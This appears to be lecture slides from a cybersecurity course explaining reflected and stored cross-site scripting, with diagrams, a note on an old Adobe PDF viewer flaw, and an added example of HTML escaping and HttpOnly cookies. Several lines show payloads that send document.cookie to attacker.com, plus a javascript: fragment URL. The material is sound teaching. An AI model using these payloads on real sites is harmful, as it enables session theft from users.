[Figure: reflected XSS flow. Pre-setup by the attacker: www.attacker.com serves a page containing a bad link. (3) The victim client clicks on the link. (4) The victim server, www.victim.com, echoes the user input back to the victim client.]
Bad link served by the attacker:
http://victim.com/search.php?term=<script> ... </script>
Page returned by the victim server:
<html>
Results for
<script>
window.open(http://attacker.com?
... document.cookie ...)
</script>
</html>
What is XSS?
• An XSS vulnerability is present when an attacker can inject scripting code into pages generated by a web application
• Methods for injecting malicious code:
– Reflected XSS (“type 1”)
• the attack script is reflected back to the user as part of a page from the victim site
– Stored XSS (“type 2”)
• the attacker stores the malicious code in a resource managed by the web application, such as a database
– Others, such as DOM-based attacks
Source: http://www.acunetix.com/news/paypal.htm
CS4293 Topics on Cybersecurity 10
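The search page from the reflected-XSS diagram above, written as an added example (not code from the slides): a vulnerable renderer that echoes the `term` parameter verbatim, the same renderer with HTML escaping, and an HttpOnly session cookie so that `document.cookie` cannot expose the authenticator even when a script does run. The function names and the cookie attributes are assumptions for illustration.

```javascript
// Added example, not from the lecture slides. Models search.php?term=...
// from the reflected-XSS diagram; function names are assumed.

// Vulnerable: the user-supplied term is echoed verbatim into the HTML,
// so a term like <script>...</script> becomes executable markup.
function renderResultsVulnerable(term) {
  return `<html>Results for ${term}</html>`;
}

// Escape the five characters that let text break out of an HTML text node
// or a quoted attribute value. The result is safe as element content.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: same page, but the term is escaped before insertion.
function renderResultsSafe(term) {
  return `<html>Results for ${escapeHtml(term)}</html>`;
}

// Second layer of defence for the cookie shown in the diagram: HttpOnly keeps
// the authenticator out of document.cookie, Secure keeps it off plain HTTP.
function sessionCookieHeader(value) {
  const v = encodeURIComponent(value);
  return `Set-Cookie: authenticator=${v}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}

// Constructed sample input modelled on the payload in the slide diagram.
const samplePayload =
  '<script>window.open("http://attacker.com?" + document.cookie)</script>';

// Quick check: does a rendered page still contain a live <script> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}
```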
Adobe PDF viewer “feature” (version <= 7.9)
http://jeremiahgrossman.blogspot.com/2007/01/what-you-need-to-know-about-uxss-in.html
Here’s how the attack works:
• Attacker locates a PDF file hosted on website.com
• Attacker creates a URL pointing to the PDF, with JavaScript Malware in the fragment portion
http://website.com/path/to/file.pdf#s=javascript:alert("xss");)
• Attacker entices a victim to click on the link
• If the victim has Adobe Acrobat Reader Plugin 7.0.x or less, confirmed in Firefox and Internet Explorer, the JavaScript Malware executes
[Figure: reflected XSS. The attacker sends bad stuff: (3) the user victim clicks on a link; (4) the server victim echoes the user input, reflecting it back; (5) the user's valuable data is sent to the attacker.]
[Figure: stored XSS. (1) The attacker injects a malicious script into the server victim, which stores the bad stuff; (2) the user victim requests content; (3) the user receives (downloads) the malicious script; (4) the attacker steals valuable data.]
[Figure: user-supplied data flowing into the application; (3) the user clicks on a link, (4) the server echoes the user input.]
Example Application
• Consider a social networking site, GraceBook, that allows users to ‘share’ happenings from around the web. Users can click the “Share with GraceBook” button which publishes content to GraceBook.
[Figure: cookie-based authentication. The server's first response carries Set-cookie: authenticator; each later GET… from the client carries Cookie: authenticator, and the server returns the response.]
Solution:
So always log out of web sites at the conclusion of your session!
Legitimate Case